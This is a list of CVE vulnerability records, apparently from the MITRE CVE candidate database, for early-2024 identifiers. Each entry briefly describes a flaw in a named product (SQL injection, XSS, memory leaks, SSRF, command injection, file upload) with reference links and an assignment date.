CVE 2024 24186 Candidate Jsish v3.5.0 (commit 42c694c) was discovered to contain a stack-overflow via the component IterGetKeysCallback at /jsish/src/jsiValue.c. MISC:https://github.com/pcmacdon/jsish/issues/98 Assigned (20240125)
CVE 2024 2418 Candidate A vulnerability was found in SourceCodester Best POS Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view_order.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256705 was assigned to this vulnerability. MISC:VDB-256705 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256705 | MISC:VDB-256705 | SourceCodester Best POS Management System view_order.php sql injection | URL:https://vuldb.com/?id.256705 | MISC:https://github.com/ycxdzj/CVE_Hunter/blob/main/SQLi-6.md | URL:https://github.com/ycxdzj/CVE_Hunter/blob/main/SQLi-6.md Assigned (20240313)
CVE 2024 24161 Candidate MRCMS 3.0 contains an Arbitrary File Read vulnerability in /admin/file/edit.do as the incoming path parameter is not filtered. MISC:https://github.com/wy876/cve/issues/2 Assigned (20240125)
CVE 2024 24160 Candidate MRCMS 3.0 contains a Cross-Site Scripting (XSS) vulnerability via /admin/system/saveinfo.do. MISC:https://github.com/wy876/cve/issues/1 Assigned (20240125)
CVE 2024 2416 Candidate Cross-Site Request Forgery vulnerability in Movistar's 4G router affecting version ES_WLD71-T1_v2.0.201820. This vulnerability allows an attacker to force an end user to execute unwanted actions in a web application in which they are currently authenticated. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-movistar-4g-router | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-movistar-4g-router Assigned (20240313)
CVE 2024 24156 Candidate Cross Site Scripting (XSS) vulnerability in Gnuboard g6 before Github commit 58c737a263ac0c523592fd87ff71b9e3c07d7cf5, allows remote attackers execute arbitrary code via the wr_content parameter. MISC:https://github.com/gnuboard/g6/issues/316 Assigned (20240125)
CVE 2024 24155 Candidate Bento4 v1.5.1-628 contains a Memory leak on AP4_Movie::AP4_Movie, parsing tracks and added into m_Tracks list, but mp42aac cannot correctly delete when we got an no audio track found error. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted mp4 file. MISC:https://github.com/axiomatic-systems/Bento4/issues/919 Assigned (20240125)
CVE 2024 24150 Candidate A memory leak issue discovered in parseSWF_TEXTRECORD in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file. MISC:https://github.com/libming/libming/issues/309 Assigned (20240125)
CVE 2024 2415 Candidate Command injection vulnerability in Movistar 4G router affecting version ES_WLD71-T1_v2.0.201820. This vulnerability allows an authenticated user to execute commands inside the router by making a POST request to the URL '/cgi-bin/gui.cgi'. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-movistar-4g-router | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-movistar-4g-router Assigned (20240313)
CVE 2024 24149 Candidate A memory leak issue discovered in parseSWF_GLYPHENTRY in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file. MISC:https://github.com/libming/libming/issues/310 Assigned (20240125)
CVE 2024 24148 Candidate A memory leak issue discovered in parseSWF_FREECHARACTER in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file. MISC:https://github.com/libming/libming/issues/308 Assigned (20240125)
CVE 2024 24147 Candidate A memory leak issue discovered in parseSWF_FILLSTYLEARRAY in libming v0.4.8 allows attackers to cause s denial of service via a crafted SWF file. MISC:https://github.com/libming/libming/issues/311 Assigned (20240125)
CVE 2024 24146 Candidate A memory leak issue discovered in parseSWF_DEFINEBUTTON in libming v0.4.8 allows attackers to cause s denial of service via a crafted SWF file. MISC:https://github.com/libming/libming/issues/307 Assigned (20240125)
CVE 2024 24142 Candidate Sourcecodester School Task Manager 1.0 allows SQL Injection via the 'subject' parameter. MISC:https://github.com/BurakSevben/School-Task-Manager-SQL-Injection-2 Assigned (20240125)
CVE 2024 24141 Candidate Sourcecodester School Task Manager App 1.0 allows SQL Injection via the 'task' parameter. MISC:https://github.com/BurakSevben/School-Task-Manager-System-SQLi-1 Assigned (20240125)
CVE 2024 24140 Candidate Sourcecodester Daily Habit Tracker App 1.0 allows SQL Injection via the parameter 'tracker.' MISC:https://github.com/BurakSevben/Daily_Habit_Tracker_App_SQL_Injection Assigned (20240125)
CVE 2024 2414 Candidate The primary channel is unprotected on Movistar 4G router affecting E version S_WLD71-T1_v2.0.201820. This device has the 'adb' service open on port 5555 and provides access to a shell with root privileges. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-movistar-4g-router | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-movistar-4g-router Assigned (20240313)
CVE 2024 24139 Candidate Sourcecodester Login System with Email Verification 1.0 allows SQL Injection via the 'user' parameter. MISC:https://github.com/BurakSevben/Login_System_with_Email_Verification_SQL_Injection/ Assigned (20240125)
CVE 2024 24136 Candidate The 'Your Name' field in the Submit Score section of Sourcecodester Math Game with Leaderboard v1.0 is vulnerable to Cross-Site Scripting (XSS) attacks. MISC:https://github.com/BurakSevben/2024_Math_Game_XSS Assigned (20240125)
CVE 2024 24135 Candidate Product Name and Product Code in the 'Add Product' section of Sourcecodester Product Inventory with Export to Excel 1.0 are vulnerable to XSS attacks. MISC:https://github.com/BurakSevben/2024_Product_Inventory_with_Export_to_Excel_XSS/ Assigned (20240125)
CVE 2024 24134 Candidate Sourcecodester Online Food Menu 1.0 is vulnerable to Cross Site Scripting (XSS) via the 'Menu Name' and 'Description' fields in the Update Menu section. MISC:https://github.com/BurakSevben/2024_Online_Food_Menu_XSS/ Assigned (20240125)
CVE 2024 24133 Candidate ** UNSUPPORTED WHEN ASSIGNED ** Atmail v6.6.0 was discovered to contain a SQL injection vulnerability via the username parameter on the login page. MISC:https://github.com/Hebing123/cve/issues/16 Assigned (20240125)
CVE 2024 24131 Candidate SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php. MISC:https://github.com/Hebing123/cve/issues/14 Assigned (20240125)
CVE 2024 24130 Candidate Mail2World v12 Business Control Center was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Usr parameter at resellercenter/login.asp. MISC:https://github.com/Hebing123/cve/issues/13 Assigned (20240125)
CVE 2024 2413 Candidate Intumit SmartRobot uses a fixed encryption key for authentication. Remote attackers can use this key to encrypt a string composed of the user's name and timestamp to generate an authentication code. With this authentication code, they can obtain administrator privileges and subsequently execute arbitrary code on the remote server using built-in system functionality. MISC:https://www.twcert.org.tw/tw/cp-132-7697-ecf10-1.html | URL:https://www.twcert.org.tw/tw/cp-132-7697-ecf10-1.html Assigned (20240313)
CVE 2024 2412 Candidate The disabling function of the user registration page for Heimavista Rpage and Epage is not properly implemented, allowing remote attackers to complete user registration on sites where user registration is supposed to be disabled. MISC:https://www.twcert.org.tw/tw/cp-132-7696-0951f-1.html | URL:https://www.twcert.org.tw/tw/cp-132-7696-0951f-1.html Assigned (20240313)
CVE 2024 24115 Candidate A stored cross-site scripting (XSS) vulnerability in the Edit Page function of Cotonti CMS v0.9.24 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload. MISC:https://mechaneus.github.io/CVE-2024-24115.html Assigned (20240125)
CVE 2024 24113 Candidate xxl-job =< 2.4.1 has a Server-Side Request Forgery (SSRF) vulnerability, which causes low-privileged users to control executor to RCE. MISC:https://github.com/xuxueli/xxl-job/issues/3375 Assigned (20240125)
CVE 2024 24112 Candidate xmall v1.1 was discovered to contain a SQL injection vulnerability via the orderDir parameter. MISC:https://github.com/Exrick/xmall/issues/78 Assigned (20240125)
CVE 2024 24110 Candidate SQL Injection vulnerability in crmeb_java before v1.3.4 allows attackers to run arbitrary SQL commands via crafted GET request to the component /api/front/spread/people. MISC:https://github.com/crmeb/crmeb_java/issues/13 Assigned (20240125)
CVE 2024 24105 Candidate SQL Injection vulnerability in Code-projects Computer Science Time Table System 1.0 allows attackers to run arbitrary code via adminFormvalidation.php. MISC:https://github.com/ASR511-OO7/CVE-2024-24105/blob/main/CVE-40 Assigned (20240125)
CVE 2024 24101 Candidate Code-projects Scholars Tracking System 1.0 is vulnerable to SQL Injection under Eligibility Information Update. MISC:https://github.com/ASR511-OO7/CVE-2024-24101/blob/main/CVE-14 Assigned (20240125)
CVE 2024 24100 Candidate Code-projects Computer Book Store 1.0 is vulnerable to SQL Injection via PublisherID. MISC:https://github.com/ASR511-OO7/CVE-2024-24100/blob/main/CVE-18 Assigned (20240125)
CVE 2024 24099 Candidate Code-projects Scholars Tracking System 1.0 is vulnerable to SQL Injection under Employment Status Information Update. MISC:https://github.com/ASR511-OO7/CVE-2024-24099/blob/main/CVE-19 Assigned (20240125)
CVE 2024 24098 Candidate Code-projects Scholars Tracking System 1.0 is vulnerable to SQL Injection via the News Feed. MISC:https://code-projects.org/scholars-tracking-system-in-php-with-source-code/ | MISC:https://github.com/ASR511-OO7/CVE-2024-24098/blob/main/CVE-13 Assigned (20240125)
CVE 2024 24097 Candidate Cross Site Scripting (XSS) vulnerability in Code-projects Scholars Tracking System 1.0 allows attackers to run arbitrary code via the News Feed. MISC:https://github.com/ASR511-OO7/CVE-2024-24097/blob/main/CVE-12 Assigned (20240125)
CVE 2024 24096 Candidate Code-projects Computer Book Store 1.0 is vulnerable to SQL Injection via BookSBIN. MISC:https://github.com/ASR511-OO7/CVE-2024-24096/blob/main/CVE-20 Assigned (20240125)
CVE 2024 24095 Candidate Code-projects Simple Stock System 1.0 is vulnerable to SQL Injection. MISC:https://github.com/ASR511-OO7/CVE-2024-24095/blob/main/CVE-21 Assigned (20240125)
CVE 2024 24093 Candidate SQL Injection vulnerability in Code-projects Scholars Tracking System 1.0 allows attackers to run arbitrary code via Personal Information Update information. MISC:https://github.com/ASR511-OO7/CVE-2024-24093/blob/main/CVE-10 Assigned (20240125)
CVE 2024 24092 Candidate SQL Injection vulnerability in Code-projects.org Scholars Tracking System 1.0 allows attackers to run arbitrary code via login.php. MISC:https://github.com/ASR511-OO7/CVE-2024-24092/blob/main/CVE-9 Assigned (20240125)
CVE 2024 24091 Candidate Yealink Meeting Server before v26.0.0.66 was discovered to contain an OS command injection vulnerability via the file upload interface. MISC:https://www.yealink.com/en/trust-center/security-advisories/2f2b990211c440cf Assigned (20240125)
CVE 2024 24062 Candidate springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sys/role. MISC:https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#12-stored-cross-site-scripting-sysrole Assigned (20240125)
CVE 2024 24061 Candidate springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sysContent/add. MISC:https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#13-stored-cross-site-scripting-syscontentadd Assigned (20240125)
CVE 2024 24060 Candidate springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sys/user. MISC:https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#11-stored-cross-site-scripting-sysuser Assigned (20240125)
CVE 2024 2406 Candidate A vulnerability, which was classified as critical, was found in Gacjie Server up to 1.0. This affects the function index of the file /app/admin/controller/Upload.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256503. MISC:VDB-256503 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256503 | MISC:VDB-256503 | Gacjie Server Upload.php index unrestricted upload | URL:https://vuldb.com/?id.256503 | MISC:https://note.zhaoj.in/share/7kZiVRqSuiMx | URL:https://note.zhaoj.in/share/7kZiVRqSuiMx Assigned (20240312)
CVE 2024 24059 Candidate springboot-manager v1.6 is vulnerable to Arbitrary File Upload. The system does not filter the suffixes of uploaded files. MISC:https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#2-file-upload-vulnerability Assigned (20240125)
CVE 2024 24050 Candidate Cross Site Scripting (XSS) vulnerability in Sourcecodester Workout Journal App 1.0 allows attackers to run arbitrary code via parameters firstname and lastname in /add-user.php. MISC:https://www.muratcagrialis.com/workout-journal-app-stored-xss-cve-2024-24050 Assigned (20240125)
CVE 2024 24043 Candidate Directory Traversal vulnerability in Speedy11CZ MCRPX v.1.4.0 and before allows a local attacker to execute arbitrary code via a crafted file. MISC:https://gist.github.com/apple502j/193358682885fe1a6708309ce934e4ed | MISC:https://github.com/Speedy11CZ/mcrpx/commit/02ca6d1fd851567560046766ac9d04d20db35b8e | MISC:https://github.com/Speedy11CZ/mcrpx/releases/tag/v1.4.1 Assigned (20240125)
CVE 2024 24042 Candidate Directory Traversal vulnerability in Devan-Kerman ARRP v.0.8.1 and before allows a remote attacker to execute arbitrary code via the dumpDirect in RuntimeResourcePackImpl component. MISC:https://gist.github.com/apple502j/193358682885fe1a6708309ce934e4ed | MISC:https://github.com/Devan-Kerman/ARRP/commit/7ea80db462c8bf66a0565e84fa49c1f2ecb9287b Assigned (20240125)
CVE 2024 24041 Candidate A stored cross-site scripting (XSS) vulnerability in Travel Journal Using PHP and MySQL with Source Code v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the location parameter at /travel-journal/write-journal.php. MISC:https://github.com/tubakvgc/CVE/blob/main/Travel_Journal_App.md | MISC:https://portswigger.net/web-security/cross-site-scripting Assigned (20240125)
CVE 2024 24035 Candidate Cross Site Scripting (XSS) vulnerability in Setor Informatica SIL 3.1 allows attackers to run arbitrary code via the hmessage parameter. MISC:https://github.com/ELIZEUOPAIN/CVE-2024-24035/tree/main Assigned (20240125)
CVE 2024 24034 Candidate Setor Informatica S.I.L version 3.0 is vulnerable to Open Redirect via the hprinter parameter, allows remote attackers to execute arbitrary code. MISC:https://github.com/ELIZEUOPAIN/CVE-2024-24034/tree/main Assigned (20240125)
CVE 2024 2403 Candidate Improper cleanup in temporary file handling component in Devolutions Remote Desktop Manager 2024.1.12 and earlier on Windows allows an attacker that compromised a user endpoint, under specific circumstances, to access sensitive information via residual files in the temporary directory. MISC:https://devolutions.net/security/advisories/DEVO-2024-0004 | URL:https://devolutions.net/security/advisories/DEVO-2024-0004 Assigned (20240312)
CVE 2024 24029 Candidate JFinalCMS 5.0.0 is vulnerable to SQL injection via /admin/content/data. MISC:https://gitee.com/heyewei/JFinalcms/issues/I8VE52 Assigned (20240125)
CVE 2024 24028 Candidate Server Side Request Forgery (SSRF) vulnerability in Likeshop before 2.5.7 allows attackers to view sensitive information via the avatar parameter in function UserLogic::updateWechatInfo. MISC:https://thanhlo.substack.com/p/khai-thac-lo-hong-cve-2024-24028 Assigned (20240125)
CVE 2024 24027 Candidate SQL Injection vulnerability in Likeshop before 2.5.7 allows attackers to run abitrary SQL commands via the function DistributionMemberLogic::getFansLists. MISC:https://samyueru.substack.com/p/cve-2024-24027-sql-injection-trong-likeshop Assigned (20240125)
CVE 2024 24026 Candidate An arbitrary File upload vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions at com.java2nb.system.controller.SysUserController: uploadImg(). An attacker can pass in specially crafted filename parameter to perform arbitrary File download. MISC:https://github.com/201206030/novel-plus | MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24026.txt Assigned (20240125)
CVE 2024 24025 Candidate An arbitrary File upload vulnerability exists in Novel-Plus v4.3.0-RC1 and prior at com.java2nb.common.controller.FileController: upload(). An attacker can pass in specially crafted filename parameter to perform arbitrary File download. MISC:https://github.com/201206030/novel-plus | MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24025.txt Assigned (20240125)
CVE 2024 24024 Candidate An arbitrary File download vulnerability exists in Novel-Plus v4.3.0-RC1 and prior at com.java2nb.common.controller.FileController: fileDownload(). An attacker can pass in specially crafted filePath and fieName parameters to perform arbitrary File download. MISC:https://github.com/201206030/novel-plus | MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24024.txt Assigned (20240125)
CVE 2024 24023 Candidate A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior. An attacker can pass specially crafted offset, limit, and sort parameters to perform SQL injection via /novel/bookContent/list. MISC:https://github.com/201206030/novel-plus | MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24023.txt Assigned (20240125)
CVE 2024 24021 Candidate A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior. An attacker can pass specially crafted offset, limit, and sort parameters to perform SQL injection via /novel/userFeedback/list. MISC:https://github.com/201206030/novel-plus | MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24021.txt Assigned (20240125)
CVE 2024 24019 Candidate A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL injection via /system/roleDataPerm/list MISC:https://github.com/201206030/novel-plus | MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24019.txt Assigned (20240125)
CVE 2024 24018 Candidate A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL injection via /system/dataPerm/list MISC:https://github.com/201206030/novel-plus | MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24018.txt Assigned (20240125)
CVE 2024 24017 Candidate A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /common/dict/list MISC:https://github.com/201206030/novel-plus | MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24017.txt Assigned (20240125)
CVE 2024 24015 Candidate A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL via /sys/user/exit MISC:https://github.com/201206030/novel-plus | MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24015.txt Assigned (20240125)
CVE 2024 24014 Candidate A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /novel/author/list MISC:https://github.com/201206030/novel-plus | MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24014.txt Assigned (20240125)
CVE 2024 24013 Candidate A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /novel/pay/list MISC:https://github.com/201206030/novel-plus | MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24013.txt Assigned (20240125)
CVE 2024 24004 Candidate jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findInOutDetail() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection. MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24004.txt | MISC:https://github.com/jishenghua/jshERP/issues/99 Assigned (20240125)
CVE 2024 24003 Candidate jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findInOutMaterialCount() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection. MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24003.txt | MISC:https://github.com/jishenghua/jshERP/issues/99 Assigned (20240125)
CVE 2024 24002 Candidate jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.MaterialController: com.jsh.erp.utils.BaseResponseInfo getListWithStock() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection. MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24002.txt | MISC:https://github.com/jishenghua/jshERP/issues/99 Assigned (20240125)
CVE 2024 24001 Candidate jshERP v3.3 is vulnerable to SQL Injection. via the com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findallocationDetail() function of jshERP which allows an attacker to construct malicious payload to bypass jshERP's protection mechanism. MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24001.txt | MISC:https://github.com/jishenghua/jshERP/issues/99 Assigned (20240125)
CVE 2024 24000 Candidate jshERP v3.3 is vulnerable to Arbitrary File Upload. The jshERP-boot/systemConfig/upload interface does not check the uploaded file type, and the biz parameter can be spliced into the upload path, resulting in arbitrary file uploads with controllable paths. MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24000.txt | MISC:https://github.com/jishenghua/jshERP Assigned (20240125)
CVE 2024 2400 Candidate Use after free in Performance Manager in Google Chrome prior to 122.0.6261.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-99d177633f | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T55OZ7JOMLNT5ICM4DTCZOJZD6TZICKO/ | FEDORA:FEDORA-2024-ac1eb810c5 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VIKPDCUMQNF2DFB7TU3V4ISJ7WFJH7YI/ | MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_12.html | URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_12.html | MISC:https://issues.chromium.org/issues/327696052 | URL:https://issues.chromium.org/issues/327696052 Assigned (20240312)
CVE 2024 2399 Candidate The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 4.10.23 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.10.23/widgets/premium-media-wheel.php#L2753 | URL:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.10.23/widgets/premium-media-wheel.php#L2753 | MISC:https://plugins.trac.wordpress.org/changeset/3051259/premium-addons-for-elementor/trunk/widgets/premium-media-wheel.php | URL:https://plugins.trac.wordpress.org/changeset/3051259/premium-addons-for-elementor/trunk/widgets/premium-media-wheel.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/dc057069-15cd-477f-9106-e616e919c62f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/dc057069-15cd-477f-9106-e616e919c62f?source=cve Assigned (20240312)
CVE 2024 23985 Candidate EzServer 6.4.017 allows a denial of service (daemon crash) via a long string, such as one for the RNTO command. MISC:https://packetstormsecurity.com/files/176663/EzServer-6.4.017-Denial-Of-Service.html Assigned (20240125)
CVE 2024 23982 Candidate When a BIG-IP PEM classification profile is configured on a UDP virtual server, undisclosed requests can cause the Traffic Management Microkernel (TMM) to terminate. This issue affects classification engines using signatures released between 09-08-2022 and 02-16-2023. See the table in the F5 Security Advisory for a complete list of affected classification signature files. NOTE: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000135946 | URL:https://my.f5.com/manage/s/article/K000135946 Assigned (20240201)
CVE 2024 23979 Candidate When SSL Client Certificate LDAP or Certificate Revocation List Distribution Point (CRLDP) authentication profile is configured on a virtual server, undisclosed requests can cause an increase in CPU resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000134516 | URL:https://my.f5.com/manage/s/article/K000134516 Assigned (20240201)
CVE 2024 23978 Candidate Heap-based buffer overflow vulnerability exists in HOME SPOT CUBE2 V102 and earlier. By processing invalid values, arbitrary code may be executed. Note that the affected products are no longer supported. MISC:https://jvn.jp/en/vu/JVNVU93740658/ | URL:https://jvn.jp/en/vu/JVNVU93740658/ | MISC:https://www.au.com/support/service/mobile/guide/wlan/home_spot_cube_2/ | URL:https://www.au.com/support/service/mobile/guide/wlan/home_spot_cube_2/ Assigned (20240125)
CVE 2024 23976 Candidate When running in Appliance mode, an authenticated attacker assigned the Administrator role may be able to bypass Appliance mode restrictions utilizing iAppsLX templates on a BIG-IP system. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K91054692 | URL:https://my.f5.com/manage/s/article/K91054692 Assigned (20240201)
CVE 2024 23975 Candidate SQL injection vulnerability exists in GetDIAE_slogListParameters. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 Assigned (20240312)
CVE 2024 23952 Candidate This is a duplicate for CVE-2023-46104. With correct CVE version ranges for affected Apache Superset. Uncontrolled resource consumption can be triggered by authenticated attacker that uploads a malicious ZIP to import database, dashboards or datasets. This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1. MISC:https://lists.apache.org/thread/zc58zvm4414molqn2m4d4vkrbrsxdksx | URL:https://lists.apache.org/thread/zc58zvm4414molqn2m4d4vkrbrsxdksx | MLIST:[oss-security] 20240214 CVE-2024-23952: Apache Superset: Allows for uncontrolled resource consumption via a ZIP bomb (version range fix for CVE-2023-46104) | URL:http://www.openwall.com/lists/oss-security/2024/02/14/2 | MLIST:[oss-security] 20240214 Re: CVE-2024-23952: Apache Superset: Allows for uncontrolled resource consumption via a ZIP bomb (version range fix for CVE-2023-46104) | URL:http://www.openwall.com/lists/oss-security/2024/02/14/3 Assigned (20240124)
CVE 2024 2395 Candidate The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.14. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to generate and delete labels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4ff1d12e-1129-40d3-8c29-3a46ffc77872?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4ff1d12e-1129-40d3-8c29-3a46ffc77872?source=cve Assigned (20240312)
CVE 2024 23946 Candidate Possible path traversal in Apache OFBiz allowing file inclusion. Users are recommended to upgrade to version 18.12.12, that fixes the issue. MISC:https://issues.apache.org/jira/browse/OFBIZ-12884 | URL:https://issues.apache.org/jira/browse/OFBIZ-12884 | MISC:https://lists.apache.org/thread/w4lp5ncpzttf41hn5bsc04mzq4o6lw3g | URL:https://lists.apache.org/thread/w4lp5ncpzttf41hn5bsc04mzq4o6lw3g | MISC:https://ofbiz.apache.org/download.html | URL:https://ofbiz.apache.org/download.html | MISC:https://ofbiz.apache.org/release-notes-18.12.12.html | URL:https://ofbiz.apache.org/release-notes-18.12.12.html | MISC:https://ofbiz.apache.org/security.html | URL:https://ofbiz.apache.org/security.html | MLIST:[oss-security] 20240228 CVE-2024-23946: Apache OFBiz: Path traversal or file inclusion | URL:http://www.openwall.com/lists/oss-security/2024/02/28/9 Assigned (20240124)
CVE 2024 23944 Candidate Information disclosure in persistent watchers handling in Apache ZooKeeper due to missing ACL check. It allows an attacker to monitor child znodes by attaching a persistent watcher (addWatch command) to a parent which the attacker has already access to. ZooKeeper server doesn't do ACL check when the persistent watcher is triggered and as a consequence, the full path of znodes that a watch event gets triggered upon is exposed to the owner of the watcher. It's important to note that only the path is exposed by this vulnerability, not the data of znode, but since znode path can contain sensitive information like user name or login ID, this issue is potentially critical. Users are recommended to upgrade to version 3.9.2, 3.8.4 which fixes the issue. MISC:https://lists.apache.org/thread/96s5nqssj03rznz9hv58txdb2k1lr79k | URL:https://lists.apache.org/thread/96s5nqssj03rznz9hv58txdb2k1lr79k Assigned (20240124)
CVE 2024 23941 Candidate Cross-site scripting vulnerability exists in Group Office prior to v6.6.182, prior to v6.7.64 and prior to v6.8.31, which may allow a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product. MISC:https://github.com/Intermesh/groupoffice/ | URL:https://github.com/Intermesh/groupoffice/ | MISC:https://jvn.jp/en/jp/JVN63567545/ | URL:https://jvn.jp/en/jp/JVN63567545/ | MISC:https://www.group-office.com/ | URL:https://www.group-office.com/ Assigned (20240124)
